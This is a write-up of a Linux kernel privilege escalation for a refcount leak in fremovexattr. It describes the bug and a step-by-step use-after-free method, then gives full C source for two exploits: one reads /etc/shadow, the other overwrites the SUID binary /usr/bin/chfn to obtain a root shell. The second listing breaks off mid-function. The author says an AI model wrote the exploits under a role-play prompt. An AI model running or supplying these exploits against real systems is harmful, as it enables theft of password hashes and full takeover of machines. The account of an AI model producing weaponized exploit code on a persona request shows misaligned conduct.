Linux Kernel CVE-2024-14027 LPE

The analysis and exploitation were done using Claude Opus 4.6, with A LOT of manual steering regarding the desired exploit path.

On its own, Claude started by trying to heap-spray and reclaim the object with a pipe_buffer or msg_msg spray. Even with reference exploits by @_minipli for bugs yielding the same primitive, it still had to be instructed about matching the inode/attr of the target file and about using fork so we don't crash the entire exploit.

That being said, it was able to accomplish the goal with minimal effort on my end, beyond some steering toward what I would have done myself.

The exploits at the end are on GitHub here.

The prompt:

there is a kernel vulnerability at this link that is used in a ctf, your name is bradley spengler the grsecurity kernel expert who knows how to exploit kernels. it should work on 32bit only and 6.6LTS kernel .. i need you to setup a qemu environment, trigger the bug and then write a full exploit which should give access to /etc/shadow or a full /bin/sh shell. you may only use gdb for debugging the crashes and memory/registers but you may not use gdb to influence the outcome of the exploitation at all. in the end i want a qemu i can login to and test the exploit. here is the link to the vulnerable code https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?id=a71874379ec8c6e788a61d71b3ad014a8d9a5c08

The Vulnerability:
“An unprivileged local user can exploit this to cause kernel memory exhaustion.” <— :>

Code Location: fs/xattr.c:952-976 (Linux 6.6.51 i386)

SYSCALL_DEFINE2(fremovexattr, int, fd, const char __user *, name)
{
    struct fd f = fdget(fd);          // slow path: increments f_count
    char kname[XATTR_NAME_MAX + 1];
    int error = -EBADF;

    if (!f.file)
        return error;

    error = strncpy_from_user(kname, name, sizeof(kname));
    if (error == 0 || error == sizeof(kname))
        error = -ERANGE;
    if (error < 0)
        return error;     // BUG: no fdput(f) — leaks one f_count reference

    // ... normal path calls fdput(f) at the end
    fdput(f);
    return error;
}

Root cause: Commit c03185f4a23e refactored removexattr() and moved strncpy_from_user() inline into fremovexattr(), but forgot to add fdput(f) on the early error return (line 966). Each call with an invalid name pointer leaks one refcount on the underlying struct file.

Trigger: Call fremovexattr(fd, 0x1) where 0x1 is an unmapped userspace address. strncpy_from_user() returns -EFAULT, the function returns early without calling fdput(). The fd table must be shared (via clone(CLONE_FILES)) so that fdget() takes the slow path and actually increments f_count.


Exploitation Method 1: /etc/shadow Read (exploit.c)

Concept

Overflow f_count to wrap it to 0, then free the struct file via normal close operations. The freed slab slot is reclaimed by a SUID process (passwd -S) that opens /etc/shadow. A dangling fd in the exploit process now points to the /etc/shadow struct file — read it.

Step-by-step

Phase 1: Setup — pipes first, then target file

pipe() x4              → 8 struct files allocated from filp slab cache
open("/tmp/target")    → target struct file on CURRENT cpu_slab page
dup(target_fd)         → f_count = 2 (target_fd + dangling_fd)

Why pipes first: SLUB allocates from per-CPU freelists. By allocating pipe files first, the target file lands on whatever page is current after those allocations. No more filp allocs happen until the target is freed, so the cpu_slab stays the same → the freed slot goes to the per-CPU freelist → the next filp alloc (by passwd) reclaims it.

Phase 2: Shared fd table for slow-path fdget

clone(CLONE_VM | CLONE_FILES) → idle child shares fd table

Why: fdget() checks atomic_long_read(&files->count). If count > 1 (shared fd table), it takes the slow path: atomic_long_inc_not_zero(&file->f_count). If count == 1, it takes the fast path: just reads the pointer without touching f_count. We need the slow path during overflow so each fremovexattr actually increments f_count.

Phase 3: Refcount overflow

3 worker threads (clone CLONE_VM | CLONE_FILES):
  tight loop: fremovexattr(target_fd, 0x1) → each call leaks +1 to f_count

Starting f_count: 2
Target leaks: 0xFFFFFFFE (4,294,967,294)
Final f_count: 2 + 0xFFFFFFFE = 0x100000000 = 0 (mod 2^32)

Arithmetic: atomic_long_t on i386 is 32 bits. atomic_long_inc wraps at 2^32. After 0xFFFFFFFE leaks, f_count is exactly 0. This wrap happens via increment, not via dec_and_test, so __fput is never triggered — the struct file stays allocated but with f_count=0.

Performance: ~3.7-4.7M leaks/sec with 3 workers on KVM. Total time: ~22 minutes.

Bulk + precise finish: Workers run until within 10M of target, then stop. Main thread does remaining leaks single-threaded for precise count. If workers overshoot, a fixup loop wraps around again.

Phase 4: Enable fast-path fdget

kill(idle_child)  → files->count drops to 1

Why: With f_count=0, any future fdget() on this fd matters:

  • Slow path (files->count > 1): calls atomic_long_inc_not_zero(f_count). f_count=0 → returns NULL → EBADF. We can’t use the fd at all.
  • Fast path (files->count == 1): just reads fd_table[fd] directly without touching f_count. This lets us access the struct file even though f_count=0.

Killing the idle child drops files->count from 2 to 1, enabling fast-path fdget for all subsequent fd operations.

Phase 5: Fork spawner and closer BEFORE free

fork() → spawner child (inherits target_fd + dangling_fd)
fork() → closer child (inherits target_fd + dangling_fd)

Critical detail: fork() calls dup_fd(), which calls get_file() on every inherited fd. get_file() does atomic_long_inc() — this is unconditional (not inc_not_zero). So each fork bumps f_count by 2 (once for target_fd, once for dangling_fd).

After 2 forks: f_count = 0 + 2 + 2 = 4

Phase 6: Free the struct file

closer child:  close(target_fd) → f_count 4→3
               close(dangling_fd) → f_count 3→2
parent:        close(target_fd) → f_count 2→1
spawner child: close(target_fd) → f_count 1→0 → dec_and_test SUCCEEDS → __fput → FREED
               close(dangling_fd) → another dec_and_test on freed slab (harmless)

Key: The spawner’s close of target_fd does dec_and_test(1→0) = true → __fput() is called → struct file is freed via RCU callback → slab slot returns to SLUB freelist.

The parent keeps dangling_fd open. With fast-path fdget (files->count=1), any operation on dangling_fd reads the raw pointer from the fd table — pointing to freed/reused slab memory.

Phase 7: Spray via passwd -S

spawner child: continuous fork+execve("/usr/bin/passwd", "-S")
               each passwd opens /etc/shadow O_RDONLY → struct file allocated from filp slab

passwd -S is SUID root. When it runs, it opens /etc/shadow as root. The struct file for /etc/shadow is allocated from the same filp slab cache as the freed target — and lands in the freed slot (same CPU, same page, per-CPU freelist reuse).

Phase 8: Sacrificial child monitoring

for (;;) {
    child = fork();
    if (child == 0) {
        // In sacrificial child:
        flags = fcntl(dangling_fd, F_GETFL);  // fast-path: reads stale fd pointer
        if (flags == O_RDONLY) {               // shadow opened O_RDONLY
            fstat(dangling_fd, &sb);
            if (sb.st_dev == shadow_dev && sb.st_ino == shadow_ino) {
                pread(dangling_fd, buf, 64K, 0);  // READ /etc/shadow!
                write to /tmp/shadow_dump
                _exit(0);  // SUCCESS
            }
        }
    }
    waitpid(child);  // if child crashed (kernel oops), parent retries
}

Sacrificial child pattern (from CVE-2022-22942): The stale fd points to freed/reused slab memory. Operations on it may trigger kernel NULL dereferences (e.g., f_path.mnt is garbage, path_init dereferences it). If the child oopses, only the child dies — parent survives and forks another.

dev/ino match: Before the exploit, we stat("/etc/shadow") to get the device and inode. The child’s fstat() on the stale fd compares against these to confirm it’s truly /etc/shadow (not /etc/passwd or something else the SUID process opened).

Result: Parent receives child’s exit(0) → success. /etc/shadow contents (yescrypt password hashes) printed to stdout and saved to /tmp/shadow_dump.


Exploitation Method 2: SUID Binary Overwrite → Root Shell (exploit_dc.c)

Concept

Same refcount overflow, but instead of reading a privileged file, we use a double-close technique to overwrite a SUID root binary (/usr/bin/chfn) with our own code, then exec it for a root shell.

The double-close technique chains two UAFs: first to create a writable mmap, then to redirect that mmap’s backing file to a SUID binary.

Step-by-step

Phases 1-4: Identical to exploit.c

Pipes first → open target → clone idle child → overflow f_count to 0 → kill idle child for fast-path fdget.

Phase 5: Free the struct file via fork helper

This is where exploit_dc.c differs from exploit.c. After overflow, f_count=0.

The problem: Simply calling close(target_fd) runs dec_and_test on f_count=0. dec_and_test decrements first, then tests: 0 wraps to 0xFFFFFFFF, which is not 0, so __fput is never called and the struct file is never freed.

The fix: Fork a helper child:

pid_t free_pid = fork();
if (free_pid == 0) {
    close(target_fd);     // f_count 2→1 (dec_and_test: 1≠0)
    close(dangling_fd);   // f_count 1→0 (dec_and_test: 0=0 → __fput → FREED!)
    _exit(0);
}
waitpid(free_pid, NULL, 0);
close(target_fd);  // parent cleanup (harmless fput on freed memory)

fork() calls get_file() with atomic_long_inc (unconditional) on every inherited fd. With f_count=0:

  • target_fd: 0 → 1
  • dangling_fd: 0 → 1 (same underlying struct file, so actually 1 → 2)
  • Net: f_count = 0 + 2 = 2

Child closes both → dec_and_test(2→1) no, dec_and_test(1→0) yes → __fput() → struct file freed via RCU.

Parent still has dangling_fd open. With fast-path fdget (files->count=1), it can access the freed slab slot.

Phase 6: Spray temp files to reclaim the slot

for (i = 0; i < 256; i++) {
    temp_fds[i] = open("/var/tmp/.xtmp_N", O_RDWR | O_CREAT | O_TRUNC, 0600);
    unlink(path);
    ftruncate(temp_fds[i], prog_size);
}

256 temp files opened O_RDWR. Each open() allocates a struct file from the filp slab cache. One of them reclaims the freed slot. The dangling_fd now points to a temp file’s struct file.

Phase 7: Identify which temp file reclaimed the slot

flags = fcntl(dangling_fd, F_GETFL);     // fast-path: reads through stale pointer
fstat(dangling_fd, &stale_sb);           // get inode of whatever's in the slot
for (i = 0; i < 256; i++) {
    fstat(temp_fds[i], &sb);
    if (sb.st_ino == stale_sb.st_ino && sb.st_dev == stale_sb.st_dev) {
        match_fd = temp_fds[i];          // FOUND IT
        break;
    }
}

Retry loop: If the slot was taken by a kernel-internal file (not our temp file), close everything, wait 200ms, and spray again. Up to 20 retries with readlink(/proc/self/fd/N) diagnostics.

Phase 8: Create writable mmap (but DON’T touch it yet)

void *mmap_addr = mmap(NULL, prog_size, PROT_READ | PROT_WRITE,
                        MAP_SHARED, match_fd, 0);
// Close ALL temp fds — mmap holds the last reference
for (i = 0; i < 256; i++) close(temp_fds[i]);

Critical: mmap() checks PROT_WRITE against match_fd’s file mode (O_RDWR) — this check passes because it’s our temp file. The kernel creates a VMA with vm_file pointing to the temp file’s struct file. vm_file holds a reference (f_count=1 after closing all temp fds).

Lazy pages: We don’t touch the mapping yet. Page faults are resolved lazily, via vm_file->f_mapping. We want the faults to happen after we swap the struct file underneath.

Phase 9: Double close (second free)

close(dangling_fd);  // fput on temp file's struct file
                     // f_count was 1 (only mmap ref) → 0 → __fput → FREED AGAIN
usleep(200000);      // RCU grace period

This is the double close. dangling_fd still points to the same struct file as match_fd (the temp file). Closing it calls fput() → dec_and_test(1→0) → __fput() → struct file freed via RCU.

The mmap’s VMA still has vm_file pointing to the now-freed struct file. This is the second dangling reference.

Phase 10: Reallocate with SUID target

for (i = 0; i < 256; i++)
    suid_fds[i] = open("/usr/bin/chfn", O_RDONLY);

256 opens of the SUID binary. One of them reclaims the freed slab slot. The mmap’s vm_file now points to /usr/bin/chfn’s struct file. Specifically, vm_file->f_mapping now points to chfn’s inode address_space.

Phase 11: Overwrite via mmap

memcpy(mmap_addr, prog_addr, prog_size);

memcpy triggers page faults on the mmap. The kernel resolves each fault via:

  1. vma->vm_file → points to chfn’s struct file (swapped!)
  2. file->f_mapping → chfn’s inode address_space
  3. Page cache lookup in chfn’s address_space
  4. Write lands in chfn’s page cache → overwrites /usr/bin/chfn on disk

Key insight: The PROT_WRITE check was done at mmap() time against the temp file (O_RDWR). The kernel doesn’t re-verify write permission when the struct file underneath changes to an O_RDONLY file. The VMA flags say “writable” and that’s what the page fault handler honors.

Phase 12: Exec for root shell

// exploit_dc.c starts with:
if (!geteuid()) {
    setuid(0); setgid(0);
    execve("/bin/sh", ...);
}

// After overwrite:
execve("/usr/bin/chfn", ...);  // chfn is now our binary, SUID root → euid=0 → /bin/sh

The overwritten chfn is our exploit binary. When exec’d, it’s SUID root, so geteuid() == 0. The entry check triggers: setuid(0), setgid(0), execve("/bin/sh") → root shell.

Phase 13: Become a ghost

setsid();
close(0); close(1); close(2);
sigfillset(&set); sigprocmask(SIG_BLOCK, &set, NULL);
for (;;) pause();

The mmap still holds a dangling vm_file. If the process exits, the VFS tries to clean up and hits f_count=0 → kernel warning “VFS: Close: file count is 0” or worse, an oops. So the process daemonizes and sleeps forever to avoid triggering cleanup.

exploit.c

/*
 * CVE-2024-14027 Exploit
 * fremovexattr fdput leak → refcount overflow → UAF → same-type object reuse
 * Target: Linux 6.6.51 i386 (QEMU, no SMEP/SMAP, no KASLR)
 *
 * Strategy:
 *   1. Create all pipes FIRST (so their struct files don't pollute cpu_slab)
 *   2. Open target file, dup → f_count = 2 (on current cpu_slab)
 *   3. clone(CLONE_FILES) for fdget slow path during overflow
 *   4. Overflow f_count via fremovexattr bug
 *   5. Fork spawner/closer BEFORE free (no new struct file allocs)
 *   6. Free via closer+parent+spawner close sequence
 *   7. Freed struct file stays on cpu_slab per-cpu freelist (key fix!)
 *   8. passwd spray churns slab → /etc/shadow lands in freed slot
 *   9. Sacrificial child checks stale fd via stat/inode match → reads shadow
 *
 * Monitoring pattern from CVE-2022-22942 (minipli):
 *   - stat() victim file to get dev/ino before exploit
 *   - Fork sacrificial child to probe stale fd (handles kernel oopses)
 *   - Child uses fcntl(F_GETFL) + fstat() + dev/ino compare
 *   - Parent survives oopses, retries with new child
 *
 * Compile: gcc -m32 -static -O2 -o exploit exploit.c
 */
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sched.h>
#include <signal.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/syscall.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/prctl.h>
#include <sys/sysmacros.h>

#define TARGET_LEAKS    0xFFFFFFFEUL
#define SLACK           10000000UL

#define NUM_WORKERS     3
#define STACK_SIZE      (64 * 1024)

#define VICTIM_FILE     "/etc/shadow"
#define VICTIM_HELPER   "/usr/bin/passwd"
#define NUM_PROCS       10

extern char **environ;

static volatile unsigned long leak_count;
static volatile int go;
static volatile int stop_workers;
static int target_fd;
static int dangling_fd;

static dev_t victim_dev;
static ino_t victim_ino;

static inline long fast_fremovexattr(int fd, const void *name)
{
    long ret;
    __asm__ volatile("int $0x80"
                     : "=a"(ret)
                     : "a"(237), "b"(fd), "c"(name)
                     : "memory");
    return ret;
}

/* ------------------------------------------------------------------ */
/* Leak worker: tight fremovexattr loop                                */
/* ------------------------------------------------------------------ */
static int leak_worker(void *arg)
{
    unsigned long local = 0;
    int fd = target_fd;
    (void)arg;

    cpu_set_t all;
    CPU_ZERO(&all);
    for (int i = 0; i < 4; i++) CPU_SET(i, &all);
    sched_setaffinity(0, sizeof(all), &all);

    while (!go)
        __asm__ volatile("pause");

    while (!stop_workers) {
        fast_fremovexattr(fd, (const void *)0x1UL);
        local++;
        if ((local & 0xFFFFF) == 0)
            __sync_fetch_and_add(&leak_count, 0x100000);
    }

    __sync_fetch_and_add(&leak_count, local & 0xFFFFF);
    _exit(0);
    return 0;
}

/* ------------------------------------------------------------------ */
/* idle_fn: keeps fd table shared so fdget takes slow path             */
/* ------------------------------------------------------------------ */
static int idle_fn(void *arg)
{
    (void)arg;
    for (;;) pause();
    return 0;
}

/* ------------------------------------------------------------------ */
/* fd_closer: forked BEFORE free, closes inherited fds to trigger free */
/* ------------------------------------------------------------------ */
static void fd_closer(int ready_fd)
{
    if (prctl(PR_SET_PDEATHSIG, SIGKILL, 0, 0, 0) < 0)
        _exit(1);

    close(target_fd);
    close(dangling_fd);

    write(ready_fd, "R", 1);
    close(ready_fd);

    for (;;) pause();
}

/* ------------------------------------------------------------------ */
/* passwd_spawner: continuously fork+exec "passwd -S" as root          */
/* ------------------------------------------------------------------ */
static void passwd_spawner(int pipe_rd, int pipe_wr, int freed_wr)
{
    char *argv[] = { VICTIM_HELPER, "-S", NULL };
    int procs = 0;
    char ch;

    if (prctl(PR_SET_PDEATHSIG, SIGKILL, 0, 0, 0) < 0)
        _exit(1);

    /* Signal ready */
    if (write(pipe_wr, "1", 1) <= 0)
        _exit(1);

    /* Wait for "go" signal */
    if (read(pipe_rd, &ch, sizeof(ch)) <= 0)
        _exit(1);

    /* Close our refs to the target file → triggers __fput → slab freed */
    close(target_fd);
    close(dangling_fd);

    /* Signal parent that we've freed the struct file */
    write(freed_wr, "F", 1);
    close(freed_wr);

    /* Close stdio to minimize noise */
    close(0); close(1); close(2);

    for (;;) {
        switch (fork()) {
            case -1:
                usleep(1);
                break;
            case 0:
                execve(VICTIM_HELPER, argv, environ);
                _exit(1);
            default:
                procs++;
        }

        if (procs >= NUM_PROCS) {
            if (wait(NULL) > 0)
                procs--;
            while (waitpid(-1, NULL, WNOHANG) > 0)
                procs--;
        }
    }
}

/* ------------------------------------------------------------------ */
/* check_fd: runs in sacrificial child, checks if stale fd is shadow   */
/* ------------------------------------------------------------------ */
static void check_fd(void)
{
    const int shadow_flags = O_RDONLY;
    char buf[64 * 1024];
    struct stat sb;
    int flags;

    for (;;) {
        usleep(1);

        /* passwd opens /etc/shadow with O_RDONLY */
        flags = fcntl(dangling_fd, F_GETFL);
        if (flags < 0 || (flags & O_ACCMODE) != shadow_flags)
            continue;

        if (fstat(dangling_fd, &sb) != 0)
            continue;

        if (sb.st_dev == victim_dev && sb.st_ino == victim_ino) {
            ssize_t cnt = pread(dangling_fd, buf, sizeof(buf) - 1, 0);

            if (cnt > 0) {
                buf[cnt] = '\0';
                /* Write to file first (survives kernel log noise) */
                int out = open("/tmp/shadow_dump", O_WRONLY | O_CREAT | O_TRUNC, 0600);
                if (out >= 0) {
                    write(out, buf, cnt);
                    close(out);
                }
                printf("\n\n========================================\n");
                printf(" SUCCESS! Read %s via stale fd %d (%zd bytes)\n",
                       VICTIM_FILE, dangling_fd, cnt);
                printf("========================================\n\n");
                printf("%s\n", buf);
                printf("\n[+] Shadow data also saved to /tmp/shadow_dump\n");
                _exit(0);
            }
        }
    }
}

/* ------------------------------------------------------------------ */
/* Main                                                                */
/* ------------------------------------------------------------------ */
int main(void)
{
    pid_t worker_pids[NUM_WORKERS];
    pid_t idle_child;

    setbuf(stdout, NULL);

    printf("[*] CVE-2024-14027 exploit — PID %d\n", getpid());
    printf("[*] Strategy: refcount overflow → UAF → slab reuse polling\n");
    printf("[*] SLUB fix: pipes before target → freed slot stays on cpu_slab\n\n");

    /* Verify SUID helper exists */
    struct stat st;
    if (stat(VICTIM_HELPER, &st) != 0) {
        printf("[!] %s not found\n", VICTIM_HELPER);
        return 1;
    }
    if (!(st.st_uid == 0 && (st.st_mode & 04111) == 04111)) {
        printf("[!] %s is not SUID root (uid=%d mode=%o)\n",
               VICTIM_HELPER, st.st_uid, st.st_mode);
        return 1;
    }
    printf("[+] %s is SUID root\n", VICTIM_HELPER);

    /* Gather stat info for victim file (dev/ino for check_fd match) */
    {
        struct stat vsb;
        if (stat(VICTIM_FILE, &vsb) < 0) {
            perror("[!] stat(" VICTIM_FILE ")");
            return 1;
        }
        victim_dev = vsb.st_dev;
        victim_ino = vsb.st_ino;
        printf("[+] %s: dev=(%d,%d) ino=%lu\n", VICTIM_FILE,
               major(victim_dev), minor(victim_dev), (unsigned long)victim_ino);
    }

    /* Pin to CPU 0 for consistent SLUB cpu_slab */
    cpu_set_t cpu0;
    CPU_ZERO(&cpu0);
    CPU_SET(0, &cpu0);
    sched_setaffinity(0, sizeof(cpu0), &cpu0);

    /* ---- Phase 1: Create ALL pipes FIRST ----
     * These allocate struct files from the filp slab cache.
     * By doing this BEFORE opening the target file, the target's
     * struct file will be allocated on whatever cpu_slab page is
     * current AFTER these allocations. Then no more filp allocs
     * happen until the target is freed, so the cpu_slab stays put. */
    int spawn_pipes[2][2];
    int closer_pipe[2];
    int freed_pipe[2];

    if (pipe(spawn_pipes[0]) < 0 || pipe(spawn_pipes[1]) < 0 ||
        pipe(closer_pipe) < 0 || pipe(freed_pipe) < 0) {
        perror("[!] pipe");
        return 1;
    }
    printf("[+] All pipes created (8 struct files allocated from filp cache)\n");

    /* ---- Phase 2: Open target file ----
     * This struct file goes on the CURRENT cpu_slab.
     * No more filp allocs will happen until this is freed. */
    target_fd = open("/tmp/exploit_target", O_RDWR | O_CREAT | O_TRUNC, 0666);
    if (target_fd < 0) { perror("[!] open"); return 1; }

    dangling_fd = dup(target_fd);
    if (dangling_fd < 0) { perror("[!] dup"); return 1; }

    printf("[+] target_fd=%d  dangling_fd=%d  (f_count=2)\n", target_fd, dangling_fd);

    /* Clone idle child for fdget slow path during overflow */
    {
        void *stack = mmap(NULL, STACK_SIZE, PROT_READ | PROT_WRITE,
                           MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
        if (stack == MAP_FAILED) { perror("[!] mmap"); return 1; }
        idle_child = clone(idle_fn, (char *)stack + STACK_SIZE,
                           CLONE_VM | CLONE_FILES | SIGCHLD, NULL);
        if (idle_child < 0) { perror("[!] clone idle"); return 1; }
    }

    /* ---- Phase 3: Overflow f_count ---- */
    int fast_mode = (access("/tmp/fast_mode", F_OK) == 0);

    if (fast_mode) {
        printf("[*] FAST MODE enabled (/tmp/fast_mode exists)\n");
        printf("[*] Doing 100 leaks to verify bug...\n");
        for (int i = 0; i < 100; i++)
            fast_fremovexattr(target_fd, (const void *)0x1UL);
        printf("[*] f_count should be 102 now.\n");
        printf("[*] Calling sync() — GDB: break __do_sys_sync, set f_count = 1\n");
        fflush(NULL);
        sync();
        printf("[*] Continuing after GDB intervention...\n");
    } else {
        printf("[*] Spawning %d leak workers...\n", NUM_WORKERS);
        for (int i = 0; i < NUM_WORKERS; i++) {
            void *stack = mmap(NULL, STACK_SIZE, PROT_READ | PROT_WRITE,
                               MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
            if (stack == MAP_FAILED) { perror("[!] mmap"); return 1; }
            worker_pids[i] = clone(leak_worker, (char *)stack + STACK_SIZE,
                                   CLONE_VM | CLONE_FILES | SIGCHLD, NULL);
            if (worker_pids[i] < 0) { perror("[!] clone worker"); return 1; }
        }

        unsigned long target_bulk = TARGET_LEAKS - SLACK;
        printf("[*] Starting overflow: need %lu leaks (%.2fG)\n",
               TARGET_LEAKS, TARGET_LEAKS / 1e9);

        go = 1;
        __sync_synchronize();

        unsigned long last = 0;
        while (leak_count < target_bulk) {
            usleep(2000000);
            unsigned long cur = leak_count;
            double pct = 100.0 * cur / TARGET_LEAKS;
            double rate = (cur - last) / 2.0 / 1e6;
            unsigned long remaining = TARGET_LEAKS - cur;
            double eta = (rate > 0) ? remaining / (rate * 1e6) : 9999;
            printf("\r[*] %luM / 4294M (%.1f%%)  %.1fM/s  ETA %.0fs   ",
                   cur / 1000000, pct, rate, eta);
            last = cur;
        }

        stop_workers = 1;
        __sync_synchronize();

        for (int i = 0; i < NUM_WORKERS; i++)
            waitpid(worker_pids[i], NULL, 0);

        unsigned long done = leak_count;
        printf("\n[*] Workers done: %lu leaks.\n", done);

        if (done < TARGET_LEAKS) {
            unsigned long remain = TARGET_LEAKS - done;
            printf("[*] Finishing remaining %lu precisely...\n", remain);
            for (unsigned long i = 0; i < remain; i++) {
                fast_fremovexattr(target_fd, (const void *)0x1UL);
                if ((i & 0xFFFFF) == 0 && i > 0)
                    printf("\r[*] precise: %luM / %luM   ", i / 1000000, remain / 1000000);
            }
            printf("\r[*] Precise finish done (%luM leaks)   \n", remain / 1000000);
        } else {
            unsigned long extra = done - TARGET_LEAKS;
            unsigned long fixup = (0x100000000UL - extra) & 0xFFFFFFFFUL;
            printf("[*] Workers overshot by %lu, doing %lu fixup leaks...\n", extra, fixup);
            for (unsigned long i = 0; i < fixup; i++)
                fast_fremovexattr(target_fd, (const void *)0x1UL);
        }
    }

    /* Kill idle child → files->count drops to 1 → fast-path fdget */
    kill(idle_child, SIGKILL);
    waitpid(idle_child, NULL, 0);
    printf("[*] Idle child reaped → fast-path fdget (files->count=1)\n");
    printf("[+] %s complete. Proceeding to free + spray + poll\n",
           fast_mode ? "GDB fast-forward" : "Overflow");

    /* Phase 4: Fork spawner and closer BEFORE the free */
    printf("[*] Forking passwd_spawner...\n");
    pid_t spawner_pid = fork();
    if (spawner_pid == 0) {
        close(spawn_pipes[0][1]);
        close(spawn_pipes[1][0]);
        close(closer_pipe[0]);
        close(closer_pipe[1]);
        close(freed_pipe[0]);
        passwd_spawner(spawn_pipes[0][0], spawn_pipes[1][1], freed_pipe[1]);
        _exit(0);
    }
    if (spawner_pid < 0) { perror("[!] fork spawner"); return 1; }

    /* Parent: close spawner's pipe ends */
    close(spawn_pipes[0][0]);
    close(spawn_pipes[1][1]);
    close(freed_pipe[1]);

    /* Wait for spawner ready */
    char ch;
    if (read(spawn_pipes[1][0], &ch, 1) != 1) {
        printf("[!] spawner failed to signal ready\n");
        kill(spawner_pid, SIGKILL);
        return 1;
    }
    close(spawn_pipes[1][0]);
    printf("[+] passwd_spawner ready (PID %d)\n", spawner_pid);

    /* Fork fd_closer */
    pid_t closer_pid = fork();
    if (closer_pid == 0) {
        close(closer_pipe[0]);
        close(spawn_pipes[0][1]);
        close(freed_pipe[0]);
        fd_closer(closer_pipe[1]);
        _exit(0);
    }
    if (closer_pid < 0) { perror("[!] fork closer"); return 1; }

    close(closer_pipe[1]);

    /* Wait for closer to finish closing its inherited fds */
    char ready;
    if (read(closer_pipe[0], &ready, 1) != 1) {
        printf("[!] fd_closer failed to signal ready\n");
        kill(closer_pid, SIGKILL);
        return 1;
    }
    close(closer_pipe[0]);

    /* Parent closes target_fd (keeps dangling_fd for polling) */
    close(target_fd);
    printf("[+] fd_closer done, parent target_fd closed.\n");

    /* Signal spawner to go (it will close its fds → trigger free → start spray) */
    printf("[*] Signaling spawner: close fds → free struct file → start spray\n");
    write(spawn_pipes[0][1], "G", 1);
    close(spawn_pipes[0][1]);

    /* Wait for spawner to confirm struct file is freed */
    char freed_ch;
    if (read(freed_pipe[0], &freed_ch, 1) != 1) {
        printf("[!] WARNING: spawner didn't signal freed (may still work)\n");
    }
    close(freed_pipe[0]);
    printf("[+] Struct file freed! Spawner starting passwd spray on CPU 0\n");

    /* Phase 5: Monitor stale fd in sacrificial subprocess
     *
     * Pattern from CVE-2022-22942: fork a child to probe the stale fd.
     * If the child oopses (kernel NULL deref on stale pointers), only
     * the child dies — parent survives and forks another.
     * Child uses fcntl(F_GETFL) + fstat() to match against /etc/shadow
     * dev/ino before attempting to read. */
    printf("[*] Monitoring stale fd %d...", dangling_fd);
    fflush(NULL);
    for (;;) {
        pid_t pid = fork();
        int status;

        switch (pid) {
            case  0: check_fd(); /* never returns on success (_exit(0)) */
            case -1: usleep(10);
                     continue;
        }

        if (waitpid(pid, &status, 0) < 0)
            continue;

        if (WIFEXITED(status) && WEXITSTATUS(status) == 0) {
            /* Child found and printed /etc/shadow */
            kill(spawner_pid, SIGKILL);
            kill(closer_pid, SIGKILL);
            while (waitpid(-1, NULL, WNOHANG) > 0);
            return 0;
        }

        putchar('+');
        fflush(NULL);
    }
}

exploit_dc.c

/*
 * exploit_dc.c — CVE-2024-14027 → root shell via SUID binary overwrite
 *
 * Double-close technique adapted from CVE-2022-22942-dc.c (minipli).
 *
 * Strategy:
 *   1. Overflow f_count via fremovexattr → free struct file (dangling_fd stale)
 *   2. Open temp files O_RDWR → one reallocates the freed slab
 *   3. Identify match via stale fd (fcntl + fstat inode compare)
 *   4. mmap the match (PROT_WRITE, MAP_SHARED) — lazy, no pages faulted
 *   5. Close all temp fds + close(dangling_fd) → extra fput → struct file freed again
 *   6. Open SUID target O_RDONLY → reallocate slab with SUID's struct file
 *   7. memcpy through mmap → page faults go to SUID's page cache → overwrites it
 *   8. exec overwritten SUID → root shell
 *
 * When executed as the overwritten SUID binary (euid==0), spawns /bin/sh.
 *
 * Compile: gcc -m32 -O2 -o exploit_dc exploit_dc.c
 *          (dynamic link — binary must fit inside the SUID target)
 *
 * Run:     ./exploit_dc [suid_target]   (default: /usr/bin/chfn)
 */
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sched.h>
#include <signal.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/sysmacros.h>

#define TARGET_LEAKS    0xFFFFFFFEUL
#define SLACK           10000000UL
#define NUM_WORKERS     3
#define STACK_SIZE      (64 * 1024)
#define NUM_SPRAY       256
#define MAX_DC_RETRIES  20
#define SUID_TARGET     "/usr/bin/chfn"
#define TEMP_PREFIX     "/var/tmp/.xtmp"

static volatile unsigned long leak_count;
static volatile int go;
static volatile int stop_workers;
static int target_fd;
static int dangling_fd;

/* ------------------------------------------------------------------ */
/* fremovexattr via raw int 0x80 (__NR_fremovexattr == 237 on i386)    */
/* ------------------------------------------------------------------ */
static inline long fast_fremovexattr(int fd, const void *name)
{
    long ret;
    __asm__ volatile("int $0x80"
                     : "=a"(ret)
                     : "a"(237), "b"(fd), "c"(name)
                     : "memory");
    return ret;
}

/* ------------------------------------------------------------------ */
/* Leak worker                                                         */
/* ------------------------------------------------------------------ */
static int leak_worker(void *arg)
{
    unsigned long local = 0;
    int fd = target_fd;
    (void)arg;

    cpu_set_t all;
    CPU_ZERO(&all);
    for (int i = 0; i < 4; i++) CPU_SET(i, &all);
    sched_setaffinity(0, sizeof(all), &all);

    while (!go)
        __asm__ volatile("pause");

    while (!stop_workers) {
        fast_fremovexattr(fd, (const void *)0x1UL);
        local++;
        if ((local & 0xFFFFF) == 0)
            __sync_fetch_and_add(&leak_count, 0x100000);
    }

    __sync_fetch_and_add(&leak_count, local & 0xFFFFF);
    _exit(0);
    return 0;
}

/* ------------------------------------------------------------------ */
/* Idle child for fdget slow-path during overflow                      */
/* ------------------------------------------------------------------ */
static int idle_fn(void *arg)
{
    (void)arg;
    for (;;) pause();
    return 0;
}

/* ------------------------------------------------------------------ */
/* Map a file read-only and pre-fault all pages                        */
/* ------------------------------------------------------------------ */
static void *map_file(const char *path, size_t *len)
{
    struct stat sb;
    int fd;

    fd = open(path, O_RDONLY);
    if (fd < 0) { perror(path); _exit(1); }
    if (fstat(fd, &sb)) { perror("fstat"); _exit(1); }
    *len = sb.st_size;

    void *addr = mmap(NULL, *len, PROT_READ, MAP_SHARED, fd, 0);
    if (addr == MAP_FAILED) { perror("mmap"); _exit(1); }

    /* Pre-fault to avoid page-ins during the critical path */
    for (size_t i = 0; i < *len; i += 4096)
